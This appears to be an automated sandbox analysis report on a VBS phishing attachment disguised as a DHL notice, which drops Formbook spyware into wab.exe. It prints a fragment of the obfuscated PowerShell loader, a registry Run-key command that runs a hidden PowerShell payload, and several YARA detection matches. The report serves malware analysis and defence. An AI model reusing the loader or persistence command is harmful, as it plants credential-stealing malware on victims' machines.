nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');JetJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00401806 NtdllDefWindowProc_W,16_2_00401806
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004018C0 NtdllDefWindowProc_W,16_2_004018C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004016FD NtdllDefWindowProc_A,19_2_004016FD
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004017B7 NtdllDefWindowProc_A,19_2_004017B7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00402CAC NtdllDefWindowProc_A,20_2_00402CAC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00402D66 NtdllDefWindowProc_A,20_2_00402D66
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB35C0 NtCreateMutant,LdrInitializeThunk,25_2_21FB35C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2B60 NtClose,LdrInitializeThunk,25_2_21FB2B60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2DF0 NtQuerySystemInformation,LdrInitializeThunk,25_2_21FB2DF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2C70 NtFreeVirtualMemory,LdrInitializeThunk,25_2_21FB2C70
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB3090 NtSetValueKey,25_2_21FB3090
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB3010 NtOpenDirectoryObject,25_2_21FB3010
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB4340 NtSetContextThread,25_2_21FB4340
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB4650 NtSuspendThread,25_2_21FB4650
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB39B0 NtGetContextThread,25_2_21FB39B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2BF0 NtAllocateVirtualMemory,25_2_21FB2BF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2BE0 NtQueryValueKey,25_2_21FB2BE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2BA0 NtEnumerateValueKey,25_2_21FB2BA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2B80 NtQueryInformationFile,25_2_21FB2B80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2AF0 NtWriteFile,25_2_21FB2AF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2AD0 NtReadFile,25_2_21FB2AD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB2AB0 NtWaitForSingleObject,25_2_21FB2AB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_036E30EF LdrInitializeThunk,Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,25_2_036E30EF
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F4CEC62_2_00007FF848F4CEC6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F4DC722_2_00007FF848F4DC72
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222F71948_2_222F7194
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222EB5C18_2_222EB5C1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0835152014_2_08351520
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_08351DF014_2_08351DF0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_083511D814_2_083511D8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B04016_2_0044B040
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0043610D16_2_0043610D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044731016_2_00447310
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044A49016_2_0044A490
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040755A16_2_0040755A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0043C56016_2_0043C560
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B61016_2_0044B610
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044D6C016_2_0044D6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004476F016_2_004476F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B87016_2_0044B870
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044081D16_2_0044081D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041495716_2_00414957
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004079EE16_2_004079EE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00407AEB16_2_00407AEB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044AA8016_2_0044AA80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00412AA916_2_00412AA9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404B7416_2_00404B74
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404B0316_2_00404B03
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044BBD816_2_0044BBD8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404BE516_2_00404BE5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404C7616_2_00404C76
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00415CFE16_2_00415CFE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00416D7216_2_00416D72
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00446D3016_2_00446D30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00446D8B16_2_00446D8B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00406E8F16_2_00406E8F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040503819_2_00405038
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0041208C19_2_0041208C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004050A919_2_004050A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040511A19_2_0040511A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0043C13A19_2_0043C13A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004051AB19_2_004051AB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044930019_2_00449300
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040D32219_2_0040D322
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044A4F019_2_0044A4F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0043A5AB19_2_0043A5AB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0041363119_2_00413631
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044669019_2_00446690
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044A73019_2_0044A730
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004398D819_2_004398D8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004498E019_2_004498E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044A88619_2_0044A886
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0043DA0919_2_0043DA09
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00438D5E19_2_00438D5E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00449ED019_2_00449ED0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0041FE8319_2_0041FE83
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00430F5419_2_00430F54
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004050C220_2_004050C2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004014AB20_2_004014AB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040513320_2_00405133
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004051A420_2_004051A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040124620_2_00401246
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040CA4620_2_0040CA46
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040523520_2_00405235
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004032C820_2_004032C8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040168920_2_00401689
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00402F6020_2_00402F60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8B1B025_2_21F8B1B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202027425_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB516C25_2_21FB516C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7010025_2_21F70100
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203132D25_2_2203132D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220403E625_2_220403E6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FC739A25_2_21FC739A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202F0CC25_2_2202F0CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220370E925_2_220370E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9D2F025_2_21F9D2F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201A11825_2_2201A118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C025_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220381CC25_2_220381CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8053525_2_21F80535
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220316CC25_2_220316CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7146025_2_21F71460
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203F7B025_2_2203F7B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F717EC25_2_21F717EC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203F43F25_2_2203F43F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203244625_2_22032446
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8077025_2_21F80770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA475025_2_21FA4750
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9C6E025_2_21F9C6E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203757125_2_22037571
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2204059125_2_22040591
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22037A4625_2_22037A46
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F829A025_2_21F829A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8599025_2_21F85990
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9696225_2_21F96962
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8995025_2_21F89950
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B95025_2_21F9B950
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201DAAC25_2_2201DAAC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202DAC625_2_2202DAC6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE8F025_2_21FAE8F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F838E025_2_21F838E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203AB4025_2_2203AB40
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203EB8925_2_2203EB89
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8A84025_2_21F8A840
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22036BD725_2_22036BD7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FBDBF925_2_21FBDBF9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202C87C25_2_2202C87C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 21F6B970 appears 122 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 21FFF290 appears 35 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 21FC7E54 appears 54 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 21FEEA12 appears 54 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
            Source: DHL_ES567436735845755676678877988975877.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
            Source: amsi64_2132.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_2668.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_5804.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_6324.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 2668, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winVBS@54/18@7/6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,16_2_004182CE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,20_2_00410DE1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,16_2_00418758
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,16_2_00413D4C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,16_2_0040B58D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Presignal23.HalJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ey2gvbbt.de4.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2132
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2668
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5804
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6324
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: wab.exe, wab.exe, 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: wab.exe, 00000010.00000002.2534745022.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2531984153.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2531046786.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2525034620.0000000004BC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: DHL_ES567436735845755676678877988975877.vbsReversingLabs: Detection: 34%
            Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_19-33249
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs"
